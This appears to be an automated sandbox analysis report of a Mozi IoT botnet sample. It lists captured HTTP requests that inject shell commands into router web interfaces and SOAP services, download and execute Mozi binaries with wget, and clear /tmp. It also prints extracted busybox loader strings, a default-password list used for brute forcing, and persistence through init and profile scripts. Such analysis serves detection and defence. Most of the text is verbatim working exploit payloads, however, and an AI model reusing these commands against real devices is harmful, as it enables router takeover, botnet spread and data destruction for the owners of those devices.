Source: global traffic	HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 23.6.123.60:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 154.209.180.104:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 154.209.180.104:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 188.215.82.71:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
Source: global traffic	HTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
Source: global traffic	HTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
Source: global traffic	HTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
Source: global traffic	HTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
Source: global traffic	HTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
Source: global traffic	HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: global traffic	HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 178.32.54.199:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 23.44.16.109:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 114.142.213.80:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: global traffic	HTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
Source: global traffic	HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 87.17.124.195:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: global traffic	HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: global traffic	HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: global traffic	HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0

Source: /tmp/Mozi.m.3 (PID: 5224)

HTML file containing JavaScript created: /usr/networks

Jump to dropped file

Source: Mozi.m.3, type: SAMPLE	Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
Source: 5220.1.00000000de7858ea.00000000135d740d.r-x.sdmp, type: MEMORY	Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
Source: 5222.1.00000000de7858ea.00000000135d740d.r-x.sdmp, type: MEMORY	Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
Source: 5242.1.00000000de7858ea.00000000135d740d.r-x.sdmp, type: MEMORY	Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
Source: /usr/networks, type: DROPPED	Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =

Source: Initial sample	Potential command found: GET /c HTTP/1.0
Source: Initial sample	Potential command found: GET %s HTTP/1.1
Source: Initial sample	Potential command found: GET /c
Source: Initial sample	Potential command found: GET /Mozi.6 HTTP/1.0
Source: Initial sample	Potential command found: GET /Mozi.7 HTTP/1.0
Source: Initial sample	Potential command found: GET /Mozi.c HTTP/1.0
Source: Initial sample	Potential command found: GET /Mozi.m HTTP/1.0
Source: Initial sample	Potential command found: GET /Mozi.x HTTP/1.0
Source: Initial sample	Potential command found: GET /Mozi.a HTTP/1.0
Source: Initial sample	Potential command found: GET /Mozi.s HTTP/1.0
Source: Initial sample	Potential command found: GET /Mozi.r HTTP/1.0
Source: Initial sample	Potential command found: GET /Mozi.b HTTP/1.0
Source: Initial sample	Potential command found: GET /Mozi.4 HTTP/1.0
Source: Initial sample	Potential command found: GET /Mozi.k HTTP/1.0
Source: Initial sample	Potential command found: GET /Mozi.l HTTP/1.0
Source: Initial sample	Potential command found: GET /Mozi.p HTTP/1.0
Source: Initial sample	Potential command found: GET /%s HTTP/1.1
Source: Initial sample	Potential command found: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://%s:%d/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: Initial sample	Potential command found: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://%s:%d/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
Source: Initial sample	Potential command found: GET /shell?cd+/tmp;rm+-rf+*;wget+http://%s:%d/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1
Source: Initial sample	Potential command found: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://%s:%d/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.m
Source: Initial sample	Potential command found: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://%s:%d/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcron

Source: Initial sample	String containing potential weak password found: admin
Source: Initial sample	String containing potential weak password found: default
Source: Initial sample	String containing potential weak password found: support
Source: Initial sample	String containing potential weak password found: service
Source: Initial sample	String containing potential weak password found: supervisor
Source: Initial sample	String containing potential weak password found: guest
Source: Initial sample	String containing potential weak password found: administrator
Source: Initial sample	String containing potential weak password found: 123456
Source: Initial sample	String containing potential weak password found: 54321
Source: Initial sample	String containing potential weak password found: password
Source: Initial sample	String containing potential weak password found: 12345
Source: Initial sample	String containing potential weak password found: admin1234

Source: ELF static info symbol of initial sample

.symtab present: no

Source: Initial sample	String containing 'busybox' found: busybox
Source: Initial sample	String containing 'busybox' found: ..%s/%s/proc/haha/tmp/var/lib/dev/syscfgtool set /mnt/jffs2/hw_ctree.xml InternetGatewayDevice.ManagementServer URL "http://127.0.0.1"cfgtool set /mnt/jffs2/hw_ctree.xml InternetGatewayDevice.ManagementServer ConnectionRequestPassword "acsMozi"iptables -I INPUT -p tcp --destination-port 35000 -j DROPiptables -I INPUT -p tcp --destination-port 50023 -j DROPiptables -I OUTPUT -p tcp --source-port 50023 -j DROPiptables -I OUTPUT -p tcp --source-port 35000 -j DROPiptables -I INPUT -p tcp --destination-port 7547 -j DROPiptables -I OUTPUT -p tcp --source-port 7547 -j DROPiptables -I INPUT -p tcp --dport 35000 -j DROPiptables -I INPUT -p tcp --dport 50023 -j DROPiptables -I OUTPUT -p tcp --sport 50023 -j DROPiptables -I OUTPUT -p tcp --sport 35000 -j DROPiptables -I INPUT -p tcp --dport 7547 -j DROPiptables -I OUTPUT -p tcp --sport 7547 -j DROP/mnt/jffs2/Equip.sh%s%s%s%s#!/bin/sh/mnt/jffs2/wifi.sh/mnt/jffs2/WifiPerformance.shbusybox%255s %255s %255s %255s
Source: Initial sample	String containing 'busybox' found: /bin/busybox cat /bin/ls\|head -n 1
Source: Initial sample	String containing 'busybox' found: /bin/busybox hexdump -e '16/1 "%c"' -n 52 /bin/ls
Source: Initial sample	String containing 'busybox' found: /bin/busybox cat /bin/ls\|more
Source: Initial sample	String containing 'busybox' found: "\x%02xsage:/bin/busybox cat /bin/ls\|head -n 1
Source: Initial sample	String containing 'busybox' found: dd bs=52 count=1 if=/bin/ls \|\| cat /bin/ls \|\| while read i; do echo $i; done < /bin/ls \|\| while read i; do echo $i; done < /bin/busybox
Source: Initial sample	String containing 'busybox' found: /bin/busybox dd bs=52 count=1 if=/bin/ls \|\| /bin/busybox cat /bin/ls \|\| while read i; do printf $i; done < /bin/ls \|\| while read i; do printf $i; done < /bin/busybox
Source: Initial sample	String containing 'busybox' found: /bin/busybox chmod 777 .i \|\| (cp /bin/ls .j && cat .i>.j &&rm .i && cp .j .i &&rm .j)
Source: Initial sample	String containing 'busybox' found: /bin/busybox echo -ne '%s' %s .i; %s && /bin/busybox echo -en '%s'
Source: Initial sample	String containing 'busybox' found: /bin/busybox echo '%s' %s .i; %s && /bin/busybox echo '%s'
Source: Initial sample	String containing 'busybox' found: ./.i %d %d %d %d %d;./Runn;/bin/busybox echo -e '%s'
Source: Initial sample	String containing 'busybox' found: >/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://%s:%d/i \|\|curl -O http://%s:%d/i \|\|/bin/busybox wget http://%s:%d/i;chmod 777 i \|\|(cp /bin/ls ii;cat i>ii &&rm i;cp ii i;rm ii);./i;/bin/busybox echo -e '%s'
Source: Initial sample	String containing 'busybox' found: >/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://%s:%d/bin.sh \|\|curl -O http://%s:%d/bin.sh \|\|/bin/busybox wget http://%s:%d/bin.sh;chmod 777 bin.sh \|\|(cp /bin/ls bix.sh;cat bin.sh>bix.sh;rm bin.sh;cp bix.sh bin.sh;rm bix.sh);sh bin.sh %s;/bin/busybox echo -e '%s'
Source: Initial sample	String containing 'busybox' found: >/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;/bin/busybox echo -e '%s'
Source: Initial sample	String containing 'busybox' found: /bin/busybox wget;/bin/busybox echo -ne '%s'
Source: Initial sample	String containing 'busybox' found: ELF.r.c.x.k.p.s.6.m.l.4>>/bin/busybox chmod 777 .i \|\| (cp /bin/ls .j && cat .i>.j &&rm .i && cp .j .i &&rm .j)>.x/bin/busybox echo -ne '%s' %s .i; %s && /bin/busybox echo -en '%s'
Source: Initial sample	String containing 'busybox' found: me./.i %d %d %d %d %d;./Runn;/bin/busybox echo -e '%s'
Source: Initial sample	String containing 'busybox' found: nvalidailedncorrecteniedoodbyebad$ELFshelldvrdvswelcomesuccessmdm96259615-cdpF6connectedBCM#usernamepass>/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://%s:%d/i \|\|curl -O http://%s:%d/i \|\|/bin/busybox wget http://%s:%d/i;chmod 777 i \|\|(cp /bin/ls ii;cat i>ii &&rm i;cp ii i;rm ii);./i;/bin/busybox echo -e '%s'
Source: Initial sample	String containing 'busybox' found: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g %s:%d -l /tmp/huawei -r /Mozi.m;chmod -x huawei;/tmp/huawei huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: Initial sample	String containing 'busybox' found: <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><SOAP-ENV:Body><u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1&qu ot;><NewNTPServer1>`cd /tmp && rm -rf * && /bin/busybox wget http://%s:%d/Mozi.m && chmod 777 /tmp/tr064 && /tmp/tr064 tr064`</NewNTPServer1><NewNTPServer2>`echo DEATH`</NewNTPServer2><NewNTPServer3>`echo DEATH`</NewNTPServer3><NewNTPServer4>`echo DEATH`</NewNTPServer4><NewNTPServer5>`echo DEATH`</NewNTPServer5></u:SetNTPServers></SOAP-ENV:Body></SOAP-ENV:Envelope>

Source: classification engine

Classification label: mal100.spre.troj.evad.lin3@0/486@5/0

Persistence and Installation Behavior

Sample tries to persist itself using System V runlevels

Source: /tmp/Mozi.m.3 (PID: 5224)

File: /etc/rcS.d/S95baby.sh

Jump to behavior

Sample tries to persist itself using /etc/profile

Source: /tmp/Mozi.m.3 (PID: 5224)	File: /etc/profile.d/cedilla-portuguese.sh	Jump to behavior
Source: /tmp/Mozi.m.3 (PID: 5224)	File: /etc/profile.d/im-config_wayland.sh	Jump to behavior
Source: /tmp/Mozi.m.3 (PID: 5224)	File: /etc/profile.d/gawk.sh	Jump to behavior
Source: /tmp/Mozi.m.3 (PID: 5224)	File: /etc/profile.d/01-locale-fix.sh	Jump to behavior
Source: /tmp/Mozi.m.3 (PID: 5224)	File: /etc/profile.d/apps-bin-path.sh	Jump to behavior
Source: /tmp/Mozi.m.3 (PID: 5224)	File: /etc/profile.d/Z99-cloudinit-warnings.sh	Jump to behavior
Source: /tmp/Mozi.m.3 (PID: 5224)	File: /etc/profile.d/vte-2.91.sh	Jump to behavior
Source: /tmp/Mozi.m.3 (PID: 5224)	File: /etc/profile.d/Z97-byobu.sh	Jump to behavior
Source: /tmp/Mozi.m.3 (PID: 5224)	File: /etc/profile.d/Z99-cloud-locale-test.sh	Jump to behavior
Source: /tmp/Mozi.m.3 (PID: 5224)	File: /etc/profile.d/xdg_dirs_desktop_session.sh	Jump to behavior
Source: /tmp/Mozi.m.3 (PID: 5224)	File: /etc/profile.d/bash_completion.sh	Jump to behavior

Sample reads /proc/mounts (often used for finding a writable filesystem)

Source: /tmp/Mozi.m.3 (PID: 5224)

File: /proc/5224/mounts

Jump to behavior

Terminates several processes with shell command 'killall'

Source: /bin/sh (PID: 5229)

Killall command executed: killall -9 telnetd utelnetd scfgmgr

Source: /tmp/Mozi.m.3 (PID: 5224)

File written: /usr/networks

Jump to dropped file

Source: /tmp/Mozi.m.3 (PID: 5224)	Shell script file created: /etc/rcS.d/S95baby.sh			Jump to dropped file
Source: /tmp/Mozi.m.3 (PID: 5224)	Shell script file created: /etc/init.d/S95baby.sh			Jump to dropped file

Source: /tmp/Mozi.m.3 (PID: 5238)

Reads from proc file: /proc/stat

Jump to behavior

Source: /usr/bin/killall (PID: 5229)	File opened: /proc/5145/stat
Source: /usr/bin/killall (PID: 5229)	File opened: /proc/1582/stat
Source: /usr/bin/killall (PID: 5229)	File opened: /proc/3088/stat
Source: /usr/bin/killall (PID: 5229)	File opened: /proc/230/stat
Source: /usr/bin/killall (PID: 5229)	File opened: /proc/110/stat
Source: /usr/bin/killall (PID: 5229)	File opened: /proc/231/stat
Source: /usr/bin/killall (PID: 5229)	File opened: /proc/111/stat
Source: /usr/bin/killall (PID: 5229)	File opened: /proc/232/stat
Source: /usr/bin/killall (PID: 5229)	File opened: /proc/1579/stat
Source: /usr/bin/killall (PID: 5229)	File opened: /proc/112/stat
Source: /usr/bin/killall (PID: 5229)	File opened: /proc/233/stat
Source: /usr/bin/killall (PID: 5229)	File opened: /proc/1699/stat
Source: /usr/bin/killall (PID: 5229)	File opened: /proc/113/stat
Source: /usr/bin/killall (PID: 5229)	File opened: /proc/234/stat
Source: /usr/bin/killall (PID: 5229)	File opened: /proc/1335/stat
Source: /usr/bin/killall (PID: 5229)	File opened: /proc/1698/stat
Source: /usr/bin/killall (PID: 5229)	File opened: /proc/114/stat
Source: /usr/bin/killall (PID: 5229)	File opened: /proc/235/stat
Source: /usr/bin/killall (PID: 5229)	File opened: /proc/1334/stat
Source: /usr/bin/killall (PID: 5229)	File opened: /proc/1576/stat
Source: /usr/bin/killall (PID: 5229)	File opened: /proc/2302/stat
Source: /usr/bin/killall (PID: 5229)	File opened: /proc/115/stat
Source: /usr/bin/killall (PID: 5229)	File opened: /proc/236/stat
Source: /usr/bin/killall (PID: 5229)	File opened: /proc/116/stat
Source: /usr/bin/killall (PID: 5229)	File opened: /proc/237/stat
Source: /usr/bin/killall (PID: 5229)	File opened: /proc/117/stat
Source: /usr/bin/killall (PID: 5229)	File opened: /proc/118/stat
Source: /usr/bin/killall (PID: 5229)	File opened: /proc/910/stat
Source: /usr/bin/killall (PID: 5229)	File opened: /proc/119/stat
Source: /usr/bin/killall (PID: 5229)	File opened: /proc/912/stat
Source: /usr/bin/killall (PID: 5229)	File opened: /proc/10/stat
Source: /usr/bin/killall (PID: 5229)	File opened: /proc/2307/stat
Source: /usr/bin/killall (PID: 5229)	File opened: /proc/11/stat
Source: /usr/bin/killall (PID: 5229)	File opened: /proc/918/stat
Source: /usr/bin/killall (PID: 5229)	File opened: /proc/12/stat
Source: /usr/bin/killall (PID: 5229)	File opened: /proc/5152/stat
Source: /usr/bin/killall (PID: 5229)	File opened: /proc/13/stat
Source: /usr/bin/killall (PID: 5229)	File opened: /proc/14/stat
Source: /usr/bin/killall (PID: 5229)	File opened: /proc/15/stat
Source: /usr/bin/killall (PID: 5229)	File opened: /proc/5155/stat
Source: /usr/bin/killall (PID: 5229)	File opened: /proc/16/stat
Source: /usr/bin/killall (PID: 5229)	File opened: /proc/17/stat
Source: /usr/bin/killall (PID: 5229)	File opened: /proc/18/stat
Source: /usr/bin/killall (PID: 5229)	File opened: /proc/1594/stat
Source: /usr/bin/killall (PID: 5229)	File opened: /proc/120/stat
Source: /usr/bin/killall (PID: 5229)	File opened: /proc/121/stat
Source: /usr/bin/killall (PID: 5229)	File opened: /proc/1349/stat
Source: /usr/bin/killall (PID: 5229)	File opened: /proc/1/stat
Source: /usr/bin/killall (PID: 5229)	File opened: /proc/122/stat
Source: /usr/bin/killall (PID: 5229)	File opened: /proc/243/stat
Source: /usr/bin/killall (PID: 5229)	File opened: /proc/123/stat
Source: /usr/bin/killall (PID: 5229)	File opened: /proc/2/stat
Source: /usr/bin/killall (PID: 5229)	File opened: /proc/124/stat
Source: /usr/bin/killall (PID: 5229)	File opened: /proc/3/stat
Source: /usr/bin/killall (PID: 5229)	File opened: /proc/4/stat
Source: /usr/bin/killall (PID: 5229)	File opened: /proc/125/stat
Source: /usr/bin/killall (PID: 5229)	File opened: /proc/126/stat
Source: /usr/bin/killall (PID: 5229)	File opened: /proc/1344/stat
Source: /usr/bin/killall (PID: 5229)	File opened: /proc/1465/stat
Source: /usr/bin/killall (PID: 5229)	File opened: /proc/1586/stat
Source: /usr/bin/killall (PID: 5229)	File opened: /proc/127/stat
Source: /usr/bin/killall (PID: 5229)	File opened: /proc/6/stat
Source: /usr/bin/killall (PID: 5229)	File opened: /proc/248/stat
Source: /usr/bin/killall (PID: 5229)	File opened: /proc/128/stat
Source: /usr/bin/killall (PID: 5229)	File opened: /proc/249/stat
Source: /usr/bin/killall (PID: 5229)	File opened: /proc/1463/stat
Source: /usr/bin/killall (PID: 5229)	File opened: /proc/800/stat
Source: /usr/bin/killall (PID: 5229)	File opened: /proc/9/stat
Source: /usr/bin/killall (PID: 5229)	File opened: /proc/801/stat
Source: /usr/bin/killall (PID: 5229)	File opened: /proc/20/stat
Source: /usr/bin/killall (PID: 5229)	File opened: /proc/21/stat
Source: /usr/bin/killall (PID: 5229)	File opened: /proc/1900/stat
Source: /usr/bin/killall (PID: 5229)	File opened: /proc/22/stat
Source: /usr/bin/killall (PID: 5229)	File opened: /proc/23/stat
Source: /usr/bin/killall (PID: 5229)	File opened: /proc/24/stat
Source: /usr/bin/killall (PID: 5229)	File opened: /proc/25/stat
Source: /usr/bin/killall (PID: 5229)	File opened: /proc/26/stat
Source: /usr/bin/killall (PID: 5229)	File opened: /proc/27/stat
Source: /usr/bin/killall (PID: 5229)	File opened: /proc/28/stat
Source: /usr/bin/killall (PID: 5229)	File opened: /proc/29/stat
Source: /usr/bin/killall (PID: 5229)	File opened: /proc/491/stat
Source: /usr/bin/killall (PID: 5229)	File opened: /proc/250/stat
Source: /usr/bin/killall (PID: 5229)	File opened: /proc/130/stat
Source: /usr/bin/killall (PID: 5229)	File opened: /proc/251/stat
Source: /usr/bin/killall (PID: 5229)	File opened: /proc/252/stat
Source: /usr/bin/killall (PID: 5229)	File opened: /proc/132/stat
Source: /usr/bin/killall (PID: 5229)	File opened: /proc/253/stat
Source: /usr/bin/killall (PID: 5229)	File opened: /proc/254/stat
Source: /usr/bin/killall (PID: 5229)	File opened: /proc/255/stat
Source: /usr/bin/killall (PID: 5229)	File opened: /proc/256/stat
Source: /usr/bin/killall (PID: 5229)	File opened: /proc/1599/stat
Source: /usr/bin/killall (PID: 5229)	File opened: /proc/257/stat
Source: /usr/bin/killall (PID: 5229)	File opened: /proc/1477/stat
Source: /usr/bin/killall (PID: 5229)	File opened: /proc/379/stat
Source: /usr/bin/killall (PID: 5229)	File opened: /proc/258/stat
Source: /usr/bin/killall (PID: 5229)	File opened: /proc/1476/stat
Source: /usr/bin/killall (PID: 5229)	File opened: /proc/259/stat
Source: /usr/bin/killall (PID: 5229)	File opened: /proc/1475/stat
Source: /usr/bin/killall (PID: 5229)	File opened: /proc/5039/stat
Source: /usr/bin/killall (PID: 5229)	File opened: /proc/936/stat
Source: /usr/bin/killall (PID: 5229)	File opened: /proc/30/stat
Source: /usr/bin/killall (PID: 5229)	File opened: /proc/2208/stat
Source: /usr/bin/killall (PID: 5229)	File opened: /proc/35/stat
Source: /usr/bin/killall (PID: 5229)	File opened: /proc/1809/stat
Source: /usr/bin/killall (PID: 5229)	File opened: /proc/1494/stat

Source: /tmp/Mozi.m.3 (PID: 5224)	File: /usr/networks (bits: - usr: rx grp: rx all: rwx)	Jump to behavior
Source: /tmp/Mozi.m.3 (PID: 5224)	File: /etc/rcS.d/S95baby.sh (bits: - usr: rx grp: rx all: rwx)	Jump to behavior
Source: /tmp/Mozi.m.3 (PID: 5224)	File: /etc/init.d/S95baby.sh (bits: - usr: rx grp: rx all: rwx)	Jump to behavior

Source: /tmp/Mozi.m.3 (PID: 5226)	Shell command executed: /bin/sh -c "killall -9 telnetd utelnetd scfgmgr"
Source: /tmp/Mozi.m.3 (PID: 5251)	Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --destination-port 41039 -j ACCEPT"
Source: /tmp/Mozi.m.3 (PID: 5260)	Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --source-port 41039 -j ACCEPT"
Source: /tmp/Mozi.m.3 (PID: 5263)	Shell command executed: /bin/sh -c "iptables -I PREROUTING -t nat -p tcp --destination-port 41039 -j ACCEPT"
Source: /tmp/Mozi.m.3 (PID: 5268)	Shell command executed: /bin/sh -c "iptables -I POSTROUTING -t nat -p tcp --source-port 41039 -j ACCEPT"
Source: /tmp/Mozi.m.3 (PID: 5271)	Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --dport 41039 -j ACCEPT"
Source: /tmp/Mozi.m.3 (PID: 5274)	Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --sport 41039 -j ACCEPT"
Source: /tmp/Mozi.m.3 (PID: 5277)	Shell command executed: /bin/sh -c "iptables -I PREROUTING -t nat -p tcp --dport 41039 -j ACCEPT"
Source: /tmp/Mozi.m.3 (PID: 5280)	Shell command executed: /bin/sh -c "iptables -I POSTROUTING -t nat -p tcp --sport 41039 -j ACCEPT"
Source: /tmp/Mozi.m.3 (PID: 5285)	Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --destination-port 58000 -j DROP"
Source: /tmp/Mozi.m.3 (PID: 5288)	Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --source-port 58000 -j DROP"
Source: /tmp/Mozi.m.3 (PID: 5291)	Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --dport 58000 -j DROP"
Source: /tmp/Mozi.m.3 (PID: 5294)	Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --sport 58000 -j DROP"
